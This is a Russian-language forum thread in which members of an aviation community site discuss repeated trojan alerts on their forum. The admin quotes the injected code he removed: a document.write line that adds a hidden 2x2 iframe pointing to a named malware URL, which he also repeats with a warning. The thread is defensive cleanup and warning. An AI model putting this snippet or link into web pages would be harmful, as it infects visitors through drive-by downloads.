• Страница 1 из 1
  • 1
Сайт ЗАРАЖЕН трояном!

Игонин Виктор

IgViktor

Админам!
Касперский обнаруживает троянскую программу!
Вчера этого не было. Проверяйте!

Начал летать в 2004 - , MAC Eden 2/Action GT/GTX, Москва

Если не знаешь, как поступить в конкретной ситуации, поступи по-человечески...

Альберт

albert33

А я проверил Каспером - ничего он мне не сказал... sad sad

Начал летать в 2005 г. - , Зорро-2-38, Хантер-31, Мустанг, д. Евдокимцево

ВСЁ У НАС ПОЛУЧИТСЯ!!!

Алексей Лимонов

DaylightOwl

Цитата (albert33)
А я проверил Каспером - ничего он мне не сказал...

Опять таже байда. Ты просто проверил, когда я в очередной раз все исправил.
Поясняю:
Сам сайт не заражен, но в одну из страниц всавляется ссылка на сайт с трояном. Этот троян как червь, заразив комп лезет, если есть доступ с компа, заражать другой сайт, а точнее вставить на его страницу ссылку на себя.
Я уже которую неделю бодаюсь со службой техподдержки....пока безрезультатно. Выяснить источник и методику не получается.

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Альберт

albert33

Цитата (DaylightOwl)
Ты просто проверил, когда я в очередной раз все исправил.

Понятно. Спасибо!

Добавлено (13.02.2013, 13:56)
---------------------------------------------
Вчера поздно вечером видел на сайте дядю Валеру под админским Ником... sad sad

Начал летать в 2005 г. - , Зорро-2-38, Хантер-31, Мустанг, д. Евдокимцево

ВСЁ У НАС ПОЛУЧИТСЯ!!!

Алексей Лимонов

DaylightOwl

К стати, эту байду ловят несколько антивирусов всего. Один из них Касперский. NOD32 и тому подобное не советую пользовать.
Советую установить вот это : http://www.kaspersky.ru/internet-security?
1600 на 2 ПК на 1 год подписка. Не эхкономте на антивирусе, дороже выдет. А эта версия еще и защищает работу с платежными системами(если пользуете). Не дает браузерам запоминать данные карт, пароли, коды и т.п.
Ставить на 3 компа вместо 2 не рекомендую очень, т.к. впоследствии ключ заблокируют и будете его разблокировать через службу техподдерки касперского.

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Танюха

Танюха

Я секьюрите всегда пользуюсь. Только на 2 компа у нас в Петушках 1050 рублей.

Началa летать в 2010 - , Танго 46, Танго 24, Петушки

Очень хочу на море!

Игонин Виктор

IgViktor

Цитата
А я проверил Каспером - ничего он мне не сказал...

Опять таже байда. Ты просто проверил, когда я в очередной раз все исправил.
Поясняю:
Сам сайт не заражен, но в одну из страниц всавляется ссылка на сайт с трояном. Этот троян как червь, заразив комп лезет, если есть доступ с компа, заражать другой сайт, а точнее вставить на его страницу ссылку на себя.
Я уже которую неделю бодаюсь со службой техподдержки....пока безрезультатно. Выяснить источник и методику не получается.


Как это!? Вот же: см. прикрепленный файл со скриптами. НЕ МОГУ ПРИКРЕПИТЬ СКРИПТ ОТЧЕТА АНТИВИРУСА КАСПЕРСКОГО! Сорри!

Начал летать в 2004 - , MAC Eden 2/Action GT/GTX, Москва

Если не знаешь, как поступить в конкретной ситуации, поступи по-человечески...

Альберт

albert33

С утра, при загрузке страницы сайта, опять "моргнул" каспер, мол загружаемый объект заражён трояном, но только один раз.
Всё открылось и при дальнейших перезагрузках более ничего не "моргало..."
А может на самом деле ничего и нету, а Касперский, просто таким образом "цену себе набивает?" sad sad

Начал летать в 2005 г. - , Зорро-2-38, Хантер-31, Мустанг, д. Евдокимцево

ВСЁ У НАС ПОЛУЧИТСЯ!!!

Алексей Лимонов

DaylightOwl

Было, вот эти строки я удалял из каждого скрипта сайта:
Код

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://taimaf.org/cwef.html?j=530705></iframe>');

На работе, к сожалению, стоит не каспер, а симантек, он дубовее и не показывает детали, а просто блокирует. Ниче не поделать - корпоративная политика.
Ссылка:
Код
http://taimaf.org/cwef.html?j=530705
и есть ссылка на сам троян, грузится он именно по этой ссылке. Тока не надо ее открывать smile
А тэг iframe - это окно с информацией с другого сайта, и судя по размерам 2х2 пикселя :-)
Ну его не увидеть.

Ну это уже технические подробности.
Вот ссылка на сайт для проверки страницы сайта:
http://antivirus-alarm.ru/proverka/
Если есть подозрение, введите в поле "Проверить" нужную страницу.
Этот сайт проверяет кучей разных способов, его рекомендовала служба техподдержки хостинга.
К сожалению проверить можно за раз 1 страницу, сайт целиком не проверяет...да и трудно это технически реализовать.
Сообщение отредактировал DaylightOwl - Четверг, 14.02.2013, 11:14

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Алексей Лимонов

DaylightOwl

результат проверки главной страницы на сегодня в 11:07
Прикрепления: 7801507.jpg (164.4 Kb)

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Игорь Губарев

Karlson

Вот что мой касперский выдаёт
Прикрепления: 9473908.jpg (27.1 Kb)
Сообщение отредактировал Igor_Gubarev - Пятница, 15.02.2013, 02:37

, Петушки

Работаю фотографом, автор сайта www.fotodeti.ru, хочу летать

Печёнкин Игорь

Машинист

У меня тоже самое wacko

,

Алексей Лимонов

DaylightOwl

Исправил в очередной раз.
Источник заражения пока не ясен.

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Альберт

albert33

Цитата (DaylightOwl)
пока не ясен.

Думаю, что на 99 процентов причина найдена и устранена!
Ближайшие сутки-двое всё расставят по своим местам.

Начал летать в 2005 г. - , Зорро-2-38, Хантер-31, Мустанг, д. Евдокимцево

ВСЁ У НАС ПОЛУЧИТСЯ!!!

Алексей Лимонов

DaylightOwl

Я появлюсь тока в воскресенье в городе. Если повторится , то переведите сайт в режим только для админов.
Иначе гугл и яндекс при заражении и долгом наличии ссылки на вирус занесут его в блэклист.

Проверить еще можно как указал выше.

Вот ссылка на сайт для проверки страницы сайта:
http://antivirus-alarm.ru/proverka/

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Альберт

albert33

Чё-то у меня в 10.30 каспер опять ругнулся про того же самого трояна... wacko wacko

Начал летать в 2005 г. - , Зорро-2-38, Хантер-31, Мустанг, д. Евдокимцево

ВСЁ У НАС ПОЛУЧИТСЯ!!!

Алексей Лимонов

DaylightOwl

Вычистил.
Альберт, Валера(Дядя_Валера). С этого времени не заходим админкой вообще в течении 7 дней, т.е. до 14-00 25.02.2013.
Через панель управления тоже.
Надо понять как происходит заражение. Если не произойдет более, то значит проблема устранена была в выходные.

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Алексей Лимонов

DaylightOwl

Прикрепления: 8912023.jpg (129.5 Kb)

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Алексей Лимонов

DaylightOwl

ВНИМАНИЕ!!!! ПОДДЕЛКА!!!
Зашел тут на некий сайт и на нем сразу всплыло предложение обновить гугл-хром.


не ведитесь, это подделка. Сайт подделывается под сайт гугла.
Обновляйте свои браузеры только через официальные сайты производителя.
Решил написать здесь как предостережение.
Прикрепления: 0352050.jpg (62.3 Kb)

Начал летать в с 1987 года на Ми-2 - , Зорро2-42, Владимир

Главное в экстремальном отдыхе - вовремя заметить, когда заканчивается экстрим и начинается пи..ец!

Воробьева Галина

Feya

Цитата
Если не произойдет более
Привет. У меня уже тихо...

Началa летать в 2006 - , Nukleon WRS, Ярославль

Альберт

albert33

Цитата (Feya)
Привет. У меня уже тихо...

Привет Гал!
У нас пока у всех тихо, пока админы на сайт не лазят... biggrin biggrin

Начал летать в 2005 г. - , Зорро-2-38, Хантер-31, Мустанг, д. Евдокимцево

ВСЁ У НАС ПОЛУЧИТСЯ!!!

Воробьева Галина

Feya

Цитата (albert33)
Привет Гал!
И вам не болеть!! Хотя, собстно, все мы одним голубым вирусом больны... online2long biggrin

Началa летать в 2006 - , Nukleon WRS, Ярославль

Альберт

albert33

Цитата (Feya)
все мы одним голубым вирусом больны...

Я "голубым" не болен.... Точно знаю... smile smile

Начал летать в 2005 г. - , Зорро-2-38, Хантер-31, Мустанг, д. Евдокимцево

ВСЁ У НАС ПОЛУЧИТСЯ!!!

Воробьева Галина

Feya

"Голубым" - да, не болен, даже не сомневалась в этом )))) а поднебесным точно smile и очень этот вирус заразный.. Настолько, что даже лечиться от него никак не хочется.. В отличии от троянского smile С выздоровлением, в общем!! up

Началa летать в 2006 - , Nukleon WRS, Ярославль

Альберт

albert33

Цитата (Feya)
а поднебесным точно

Это что, намёк на снобизм или что-то тому подобное? smile smile
Ты просто нас мало и плохо знаешь!!!
Просто мы научились отделять зёрна от плевел... biggrin biggrin

Начал летать в 2005 г. - , Зорро-2-38, Хантер-31, Мустанг, д. Евдокимцево

ВСЁ У НАС ПОЛУЧИТСЯ!!!

Воробьева Галина

Feya

Цитата
Это что, намёк на снобизм или что-то тому подобное?
Это намек на то, что все мы тут, надеюсь, любим небо, и любовь эта очень заразная, так как от нас заражаются и новые пилоты наших Стай. И это радует, меня радует (уточняю) smile

Поздравление с выздоровлением никаких намеков в себе не несет. Понимайте буквально. Рада, что избавились наконец от вирусов на форуме.
Сообщение отредактировал Feya - Пятница, 01.03.2013, 14:23

Началa летать в 2006 - , Nukleon WRS, Ярославль

  • Страница 1 из 1
  • 1
Поиск: